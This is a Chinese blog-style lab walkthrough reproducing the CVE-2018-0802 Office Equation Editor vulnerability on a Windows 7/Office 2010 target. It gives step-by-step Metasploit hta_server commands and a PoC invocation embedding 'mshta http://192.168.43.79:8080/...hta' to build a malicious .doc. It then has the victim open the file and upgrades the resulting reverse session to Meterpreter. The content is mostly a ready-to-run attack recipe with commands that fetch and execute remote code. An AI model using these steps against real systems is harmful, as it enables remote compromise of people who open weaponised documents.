CVE-2018-0802噩梦公式二代复现

一.环境搭建

攻击机:kali             ip:192.168.43.79

靶机:windows7 x64+office2010

poc下载:https://github.com/Ridter/RTF_11882_0802

二.漏洞复现

1.打开msf,msfconsole

CVE-2018-0802噩梦公式二代复现_第1张图片

2.利用exploit/windows/misc/hta_server模块,并设置参数

use exploit/windows/misc/hta_server

set LHOST 192.168.43.79

set LPORT 8888

set SRVHOST 192.168.43.79

set target 1   (靶机是x86就设置为0)

CVE-2018-0802噩梦公式二代复现_第2张图片

3.查看设置是否有误,show options

CVE-2018-0802噩梦公式二代复现_第3张图片

4.运行生成hat,exploit

CVE-2018-0802噩梦公式二代复现_第4张图片

5.复制生成的hta链接

6.运行poc,python RTF_11882_0802.py -c "mshta http://192.168.43.79:8080/GhNxAVQlLTSBRZf.hta" -o DarkHQ.doc

CVE-2018-0802噩梦公式二代复现_第5张图片

    mshta后面跟自己生成的hat链接

7.查看生成的doc文件,ls


8.这里为了方便就开启网页,然后用靶机下载

python -m SimpleHTTPServer 6666


靶机访问网站进行下载doc

CVE-2018-0802噩梦公式二代复现_第6张图片

9.靶机运行恶意doc(会提示你是否启用编辑,点启用就可以了)

CVE-2018-0802噩梦公式二代复现_第7张图片

10.返回kali,已经成功的返回了一个会话


11.切换到meterpreter,sessions -u 3 (这里我之前实验还反弹会了几个session,所以是3,可以通过sessions -i 查看你当前的session)

CVE-2018-0802噩梦公式二代复现_第8张图片

12.进入session,sessions -i 4




感谢各位大佬赏脸,有什么不足的地方请多多指教,谢谢!!!

你可能感兴趣的:(漏洞复现)